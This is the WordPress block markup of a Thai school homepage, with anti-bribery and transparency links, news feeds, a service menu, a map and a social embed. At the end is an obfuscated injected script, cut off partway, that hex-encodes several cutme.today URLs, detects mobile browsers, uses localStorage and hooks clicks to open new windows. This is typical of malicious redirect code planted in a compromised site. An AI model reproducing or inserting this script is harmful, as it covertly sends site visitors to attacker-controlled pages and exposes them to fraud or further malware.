900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"6fd1fd-18\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab6fd1fd-18\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"281735-c8\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab281735-c8\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 